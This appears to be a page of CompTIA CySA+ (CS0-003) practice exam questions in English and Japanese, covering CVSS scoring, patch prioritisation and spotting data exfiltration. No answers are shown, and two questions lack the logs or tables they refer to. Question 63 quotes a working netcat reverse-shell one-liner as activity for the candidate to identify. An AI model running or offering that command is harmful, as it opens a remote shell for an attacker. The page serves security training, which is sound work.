CS0-003 試験問題 61

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released.
Which of the following would best protect this organization?
  • CS0-003 試験問題 62

    A security analyst needs to identify a computer based on the following requirements to be mitigated:
    The attack method is network-based with low complexity.
    No privileges or user action is needed.
    The confidentiality and availability level is high, with a low integrity level.
    Given the following CVSS 3.1 output:
    Computer1: CVSS3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H
    Computer2: CVSS3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
    Computer3: CVSS3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H
    Computer4: CVSS3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
    Which of the following machines should the analyst mitigate?
  • CS0-003 試験問題 63

    A security analyst detected the following suspicious activity:
    rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity?
  • CS0-003 試験問題 64

    ハクティビストの一団が、ある銀行の競合銀行数行に侵入し、データを盗み出した。
    次のネットワーク ログ出力があるとします。

    潜在的なデータ流出に関して最も懸念されるのは次のどれですか?
    (2つ選択してください。)
  • CS0-003 試験問題 65

    A company has decided to expose several systems to the internet, The systems are currently available internally only. A security analyst is using a subset of CVSS3.1 exploitability metrics to prioritize the vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The systems and the vulnerabilities are shown below:

    Which of the following systems should be prioritized for patching?